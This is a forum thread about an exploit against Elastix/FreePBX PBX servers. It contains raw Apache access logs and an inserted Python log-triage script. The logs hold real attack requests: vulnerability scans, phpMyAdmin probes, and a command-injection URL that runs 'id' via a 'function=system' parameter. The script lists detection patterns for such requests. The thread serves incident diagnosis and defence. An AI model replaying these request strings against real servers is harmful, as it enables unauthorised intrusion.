  • Beware: New Elastix 2.5 / 4.0 FreePBX 2.11.0.26 exploit..

Check your logs (messages, httpd, secure and dmesg). You definitely have a script triggering this, so you need to find that.

Also do a recursive search for the string "magnito" across your whole system; if the script exists, it is for sure creating a file called magnito.

venturinog Here is the /etc/httpd/logs/access.log file from yesterday, June 9th, 2017:

146.0.243.29 - - [09/Jun/2017:00:58:20 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 302 233 "-" "curl/7.29.0"
195.154.181.160 - - [09/Jun/2017:01:41:28 -0400] "GET /goautodial-admin/project_auth_entries.txt HTTP/1.1" 302 246 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30"
195.154.181.160 - - [09/Jun/2017:01:41:28 -0400] "GET /agc/ HTTP/1.1" 302 209 "-" "-"
195.154.181.160 - - [09/Jun/2017:01:41:29 -0400] "POST /CGI/Execute HTTP/1.1" 302 216 "-" "-"
139.162.124.167 - - [09/Jun/2017:04:11:28 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0"
91.196.50.33 - - [09/Jun/2017:04:27:49 -0400] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 302 225 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
115.79.62.252 - - [09/Jun/2017:07:29:30 -0400] "GET / HTTP/1.1" 302 208 "-" "-"
180.234.24.160 - - [09/Jun/2017:07:51:48 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
180.234.24.160 - - [09/Jun/2017:07:51:50 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
146.0.243.29 - - [09/Jun/2017:08:30:37 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 302 233 "-" "curl/7.29.0"
46.246.37.67 - - [09/Jun/2017:08:59:03 -0400] "GET /muieblackcat HTTP/1.1" 302 217 "-" "-"
46.246.37.67 - - [09/Jun/2017:08:59:03 -0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 302 233 "-" "-"
46.246.37.67 - - [09/Jun/2017:08:59:04 -0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 302 233 "-" "-"
46.246.37.67 - - [09/Jun/2017:08:59:04 -0400] "GET //pma/scripts/setup.php HTTP/1.1" 302 226 "-" "-"
46.246.37.67 - - [09/Jun/2017:08:59:05 -0400] "GET //myadmin/scripts/setup.php HTTP/1.1" 302 230 "-" "-"
46.246.37.67 - - [09/Jun/2017:08:59:05 -0400] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 302 230 "-" "-"
::1 - - [09/Jun/2017:09:24:10 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
179.158.22.2 - - [09/Jun/2017:10:09:25 -0400] "GET /hndUnblock.cgi HTTP/1.0" 302 219 "-" "Wget(linux)"
179.158.22.2 - - [09/Jun/2017:10:09:26 -0400] "GET /tmUnblock.cgi HTTP/1.0" 302 218 "-" "Wget(linux)"
187.39.190.172 - - [09/Jun/2017:10:39:13 -0400] "GET /cgi/common.cgi HTTP/1.0" 302 219 "-" "Wget(linux)"
187.39.190.172 - - [09/Jun/2017:10:39:14 -0400] "GET /stssys.htm HTTP/1.0" 302 215 "-" "Wget(linux)"
187.39.190.172 - - [09/Jun/2017:10:39:14 -0400] "GET / HTTP/1.0" 302 205 "-" "Wget(linux)"
187.39.190.172 - - [09/Jun/2017:10:39:14 -0400] "POST /command.php HTTP/1.0" 302 216 "-" "Wget(linux)"
::1 - - [09/Jun/2017:13:08:37 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
37.199.5.125 - - [09/Jun/2017:13:58:29 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
::1 - - [09/Jun/2017:14:15:08 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
51.15.12.13 - - [09/Jun/2017:14:57:22 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 302 237 "-" "-"
87.181.110.35 - - [09/Jun/2017:15:53:33 -0400] "POST / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
217.79.182.120 - - [09/Jun/2017:16:12:36 -0400] "\x03" 400 226 "-" "-"
217.79.182.120 - - [09/Jun/2017:16:12:36 -0400] "\x03" 400 226 "-" "-"
146.0.243.29 - - [09/Jun/2017:17:41:55 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 302 233 "-" "curl/7.29.0"
45.55.11.143 - - [09/Jun/2017:20:17:43 -0400] "OPTIONS / HTTP/1.1" 400 226 "-" "-"
200.116.88.105 - - [09/Jun/2017:21:21:28 -0400] "GET /a2billing/customer/javascript/misc.js HTTP/1.1" 302 242 "-" "curl/7.15.5 (i386-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
163.172.69.33 - - [09/Jun/2017:22:01:05 -0400] "GET /recordings//theme/main.css HTTP/1.1" 302 231 "-" "curl/7.29.0"
163.172.69.33 - - [09/Jun/2017:22:01:07 -0400] "\x16\x03\x01" 400 226 "-" "-"
23.239.70.162 - - [09/Jun/2017:22:19:20 -0400] "GET / HTTP/1.1" 302 205 "-" "libwww-perl/6.23"
213.202.233.77 - - [09/Jun/2017:22:47:51 -0400] "GET /admin/ajax.php HTTP/1.1" 302 219 "-" "curl/7.29.0"
76.108.242.230 - - [09/Jun/2017:23:15:00 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
::1 - - [09/Jun/2017:23:15:11 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
::1 - - [09/Jun/2017:23:15:12 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
::1 - - [09/Jun/2017:23:15:13 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
::1 - - [09/Jun/2017:23:15:44 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
92.114.32.161 - - [09/Jun/2017:23:39:43 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 302 232 "-" "libwww-perl/6.26"
92.114.32.161 - - [09/Jun/2017:23:53:55 -0400] "GET /recordings/ HTTP/1.1" 302 216 "-" "libwww-perl/6.26"
47.93.186.14 - - [10/Jun/2017:02:00:48 -0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 302 246 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:48 -0400] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 302 246 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /pma/scripts/setup.php HTTP/1.1" 302 226 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /pma/scripts/setup.php HTTP/1.1" 302 226 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:51 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:51 -0400] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
::1 - - [10/Jun/2017:02:00:51 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
144.217.173.209 - - [10/Jun/2017:04:02:44 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
144.217.173.212 - - [10/Jun/2017:04:08:14 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
198.50.160.105 - - [10/Jun/2017:04:19:03 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
51.15.12.13 - - [10/Jun/2017:04:55:41 -0400] "GET /recordings/index.php HTTP/1.1" 302 225 "-" "-"
51.15.12.13 - - [10/Jun/2017:04:55:43 -0400] "POST /admin/ajax.php?module=music HTTP/1.1" 302 232 "http://204.13.1.139/admin/config.php" "-"
51.15.12.13 - - [10/Jun/2017:04:55:44 -0400] "POST /admin/ajax.php?module=blacklist HTTP/1.1" 302 236 "http://204.13.1.139/admin/config.php" "-"
51.15.12.13 - - [10/Jun/2017:04:55:45 -0400] "POST /admin/ajax.php?module=recordings HTTP/1.1" 302 237 "http://204.13.1.139/admin/config.php" "-"
51.15.12.13 - - [10/Jun/2017:04:55:46 -0400] "GET /admin/ajax.php HTTP/1.1" 302 219 "/admin/index.php" "-"
51.15.12.13 - - [10/Jun/2017:04:55:47 -0400] "GET /admin/config.php?display=OpenVAS&handler=api&file=OpenVAS&module=OpenVAS&function=system&args=id HTTP/1.1" 302 321 "-" "-"
51.15.12.13 - - [10/Jun/2017:04:55:48 -0400] "GET /admin/modules/backup/page.backup.php HTTP/1.1" 302 241 "-" "-"
51.15.12.13 - - [10/Jun/2017:04:55:50 -0400] "POST /vtigercrm/phprint.php HTTP/1.1" 302 226 "http://204.13.1.139/vtigercrm/phprint.php" "-"
144.217.173.209 - - [10/Jun/2017:05:04:07 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
183.129.160.229 - - [10/Jun/2017:05:06:26 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
144.217.173.212 - - [10/Jun/2017:05:09:51 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
198.50.160.105 - - [10/Jun/2017:05:24:54 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
190.94.141.214 - - [10/Jun/2017:05:42:12 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
190.94.141.214 - - [10/Jun/2017:05:42:13 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
190.94.141.214 - - [10/Jun/2017:05:42:13 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
190.94.141.214 - - [10/Jun/2017:05:42:13 -0400] "GET / HTTP/1.1" 400 226 "-" "masscan/1.0"
190.94.141.214 - - [10/Jun/2017:05:42:14 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
190.94.141.214 - - [10/Jun/2017:05:42:14 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
190.94.141.214 - - [10/Jun/2017:05:42:15 -0400] "GET / HTTP/1.1" 302 202 "-" "masscan/1.0"
144.217.173.212 - - [10/Jun/2017:06:16:52 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
144.217.173.209 - - [10/Jun/2017:06:19:25 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
198.50.160.105 - - [10/Jun/2017:06:38:58 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
1.205.110.99 - - [10/Jun/2017:07:21:35 -0400] "GET login.cgi HTTP/1.0" 400 226 "-" "-"
91.196.50.33 - - [10/Jun/2017:07:24:49 -0400] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 302 225 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
191.100.11.163 - - [10/Jun/2017:08:28:36 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
191.100.11.163 - - [10/Jun/2017:08:28:37 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
191.100.11.163 - - [10/Jun/2017:08:28:38 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
191.100.11.163 - - [10/Jun/2017:08:28:39 -0400] "GET / HTTP/1.1" 400 226 "-" "masscan/1.0"
191.100.11.163 - - [10/Jun/2017:08:28:40 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
191.100.11.163 - - [10/Jun/2017:08:28:41 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
191.100.11.163 - - [10/Jun/2017:08:28:41 -0400] "GET / HTTP/1.1" 302 202 "-" "masscan/1.0"
139.162.119.197 - - [10/Jun/2017:09:01:21 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
144.217.173.212 - - [10/Jun/2017:09:16:10 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
144.217.173.209 - - [10/Jun/2017:09:29:31 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
98.242.248.14 - - [10/Jun/2017:09:45:22 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
89.163.255.251 - - [10/Jun/2017:09:48:21 -0400] "HEAD / HTTP/1.0" 302 - "-" "-"
198.50.160.105 - - [10/Jun/2017:09:50:20 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
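
The log check suggested at the top of the thread, as an added example (not code from the thread or from the Elastix/Issabel project): a triage script for Apache access logs in the two formats posted here, grouping flagged requests by client address. The sample lines are constructed with documentation-range addresses, and the tag names and pattern lists are assumptions drawn from request types visible in the posted log.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed sample (not the poster's log): Apache "combined" and "common"
# lines modelled on the request types in the thread, using documentation-range
# addresses. The last line is cut mid-request, like a wrapped log line.
SAMPLE_LOG = r'''
198.51.100.7 - - [09/Jun/2017:07:51:48 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
203.0.113.9 - - [09/Jun/2017:08:59:03 -0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 302 233 "-" "-"
203.0.113.9 - - [09/Jun/2017:08:59:03 -0400] "GET /muieblackcat HTTP/1.1" 302 217 "-" "-"
::1 - - [09/Jun/2017:09:24:10 -0400] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) (internal dummy connection)"
192.0.2.44 - - [09/Jun/2017:16:12:36 -0400] "\x16\x03\x01" 400 226 "-" "-"
192.0.2.80 - - [10/Jun/2017:04:27:49 -0400] "GET http://proxy-test.example/check.php HTTP/1.1" 302 225 "-" "Mozilla/5.0"
192.0.2.15 - - [10/Jun/2017:04:55:47 -0400] "GET /admin/config.php?display=x&function=system&args=id HTTP/1.1" 200 321 "-" "-"
192.0.2.200 - admin [09/Jun/2017:16:00:50 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
198.51.100.23 - - [09/Jun/2017:23:15:03 -0400] "GET /themes/tenant/css/custom.css HTTP/1.1" 200 54
203.0.113.9 - - [09/Jun/2017:19:11:53 -0400] "GET /
'''

# ip, identd, user, [time], "request", status, size, then optionally the
# "referer" and "user-agent" fields that only the combined format carries.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)")?$'
)
REQUEST_RE = re.compile(r'^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$')

# Assumed pattern lists, taken from strings visible in the posted log.
SCANNER_AGENTS = ("masscan", "zmeu")
PROBE_PATH_RE = re.compile(
    r'/scripts/setup\.php$|^/w00tw00t|^/muieblackcat|/(?:tm|hnd)unblock\.cgi$',
    re.IGNORECASE,
)
# PHP functions that run OS commands; one of these named in a query string
# means the client tried to reach a command-execution code path.
EXEC_FUNCTIONS = {"system", "exec", "passthru", "shell_exec", "popen", "proc_open"}


def classify(entry):
    """Return the set of triage tags for one parsed log entry."""
    tags = set()
    agent = (entry["agent"] or "").lower()
    if any(name in agent for name in SCANNER_AGENTS):
        tags.add("scanner-agent")
    if entry["user"] != "-":
        tags.add("auth-user")            # client presented HTTP credentials
    req = REQUEST_RE.match(entry["request"])
    if not req:
        tags.add("not-http")             # e.g. a TLS hello sent to the HTTP port
        return tags
    path, _, query = req["target"].partition("?")
    if re.match(r"(?i)https?://", path):
        tags.add("proxy-probe")          # absolute URL: open-proxy test
    if PROBE_PATH_RE.search(path):
        tags.add("probe-path")
    functions = {v.lower() for v in parse_qs(query).get("function", [])}
    if functions & EXEC_FUNCTIONS:
        tags.add("exec-parameter")
    if tags and entry["status"].startswith("2"):
        tags.add("answered-2xx")         # flagged request that was served
    return tags


def triage(log_text):
    """Group flagged requests by client address.

    Returns (report, unparsed): report maps ip -> {"tags", "flagged", "total"};
    unparsed lists lines that did not match either log format.
    """
    report = defaultdict(lambda: {"tags": set(), "flagged": 0, "total": 0})
    unparsed = []
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        match = LINE_RE.match(line)
        if not match:
            unparsed.append(line)        # keep for manual review, never drop
            continue
        entry = match.groupdict()
        # Apache's own wake-up requests to its child processes are noise.
        if "internal dummy connection" in (entry["agent"] or ""):
            continue
        row = report[entry["ip"]]
        row["total"] += 1
        tags = classify(entry)
        if tags:
            row["flagged"] += 1
            row["tags"] |= tags
    return dict(report), unparsed


if __name__ == "__main__":
    report, unparsed = triage(SAMPLE_LOG)
    for ip, row in sorted(report.items(), key=lambda kv: -kv[1]["flagged"]):
        if row["flagged"]:
            print(f'{ip:15} {row["flagged"]}/{row["total"]} {sorted(row["tags"])}')
    print(f"{len(unparsed)} line(s) could not be parsed")
```

Addresses tagged `answered-2xx` are the ones to review first, since the server actually served a flagged request instead of redirecting or rejecting it.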

    venturinog And here is the /etc/httpd/logs/ssl_access.log file for yesterday, June 9th, 2017:

    13.58.12.77 - admin [09/Jun/2017:16:00:50 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:16:00:50 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:16:00:50 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:01:43 -0400] "POST / HTTP/1.1" 200 5409
    51.15.52.242 - - [09/Jun/2017:16:02:08 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
    51.15.52.242 - - [09/Jun/2017:16:02:11 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
    87.181.110.35 - - [09/Jun/2017:16:03:44 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:05:46 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:07:46 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:09:47 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:11:48 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:13:49 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:15:50 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:17:51 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:19:52 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:21:52 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:23:38 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:23:53 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:25:38 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:25:54 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:27:39 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:27:54 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:29:40 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:29:55 -0400] "POST / HTTP/1.1" 200 5409
    188.161.115.236 - - [09/Jun/2017:16:30:50 -0400] "GET /a2billing/ HTTP/1.1" 404 208
    99.64.248.239 - - [09/Jun/2017:16:31:40 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:31:56 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:33:41 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:33:57 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:35:42 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:35:58 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:37:42 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:37:58 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:39:43 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:39:59 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:41:43 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:42:00 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:43:43 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:44:01 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:45:44 -0400] "POST / HTTP/1.1" 200 5409
    51.15.52.242 - - [09/Jun/2017:16:45:59 -0400] "GET / HTTP/1.0" 400 362
    51.15.52.242 - - [09/Jun/2017:16:46:00 -0400] "GET /recordings//theme/main.css HTTP/1.1" 200 184
    87.181.110.35 - - [09/Jun/2017:16:46:01 -0400] "POST / HTTP/1.1" 200 5409
    51.15.52.242 - - [09/Jun/2017:16:47:37 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
    51.15.52.242 - - [09/Jun/2017:16:47:38 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
    99.64.248.239 - - [09/Jun/2017:16:47:44 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:48:02 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:49:44 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:50:02 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:51:45 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:52:03 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:53:45 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:54:04 -0400] "POST / HTTP/1.1" 200 5409
    13.58.12.77 - admin [09/Jun/2017:16:55:00 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - admin [09/Jun/2017:16:55:00 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:16:55:00 -0400] "POST / HTTP/1.1" 200 5409
    13.58.12.77 - - [09/Jun/2017:16:55:00 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
    99.64.248.239 - - [09/Jun/2017:16:55:45 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:56:04 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:57:46 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:58:05 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:59:46 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:00:05 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:02:06 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:04:07 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:06:07 -0400] "POST / HTTP/1.1" 200 5409
    13.58.12.77 - admin [09/Jun/2017:17:06:08 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - admin [09/Jun/2017:17:06:08 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:17:06:08 -0400] "POST / HTTP/1.1" 200 5409
    13.58.12.77 - - [09/Jun/2017:17:06:08 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
    87.181.110.35 - - [09/Jun/2017:17:08:08 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:10:10 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:12:12 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:14:13 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:16:13 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:18:14 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:20:14 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:22:15 -0400] "POST / HTTP/1.1" 200 5409
    146.0.243.29 - - [09/Jun/2017:17:39:48 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 200 283
    146.0.243.29 - - [09/Jun/2017:17:43:29 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
    146.0.243.29 - - [09/Jun/2017:17:43:29 -0400] "GET /recordings/page.framework.php HTTP/1.1" 403 231
    146.0.243.29 - - [09/Jun/2017:17:43:30 -0400] "GET /recordings/ HTTP/1.1" 200 6677
    146.0.243.29 - - [09/Jun/2017:17:52:46 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 404 230
    146.0.243.29 - - [09/Jun/2017:17:54:36 -0400] "GET /vtigercrm/test/upload/vtigercrm.txt HTTP/1.1" 404 233
    13.58.12.77 - admin [09/Jun/2017:18:00:23 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - admin [09/Jun/2017:18:00:23 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:18:00:23 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:18:00:23 -0400] "POST / HTTP/1.1" 200 5409
    13.58.12.77 - admin [09/Jun/2017:18:11:31 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - admin [09/Jun/2017:18:11:31 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:18:11:31 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:18:11:31 -0400] "POST / HTTP/1.1" 200 5409
    13.58.12.77 - admin [09/Jun/2017:19:05:42 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - admin [09/Jun/2017:19:05:42 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:19:05:42 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:19:05:42 -0400] "POST / HTTP/1.1" 200 5409
    213.202.233.77 - - [09/Jun/2017:19:11:49 -0400] "GET /jnkp.php HTTP/1.1" 404 206
    213.202.233.77 - - [09/Jun/2017:19:11:50 -0400] "GET /assets/jnkp.php HTTP/1.1" 404 213
    213.202.233.77 - - [09/Jun/2017:19:11:50 -0400] "GET /asterisk/jnkp.php HTTP/1.1" 404 216
    213.202.233.77 - - [09/Jun/2017:19:11:51 -0400] "GET /recordings/jnkp.php HTTP/1.1" 403 221
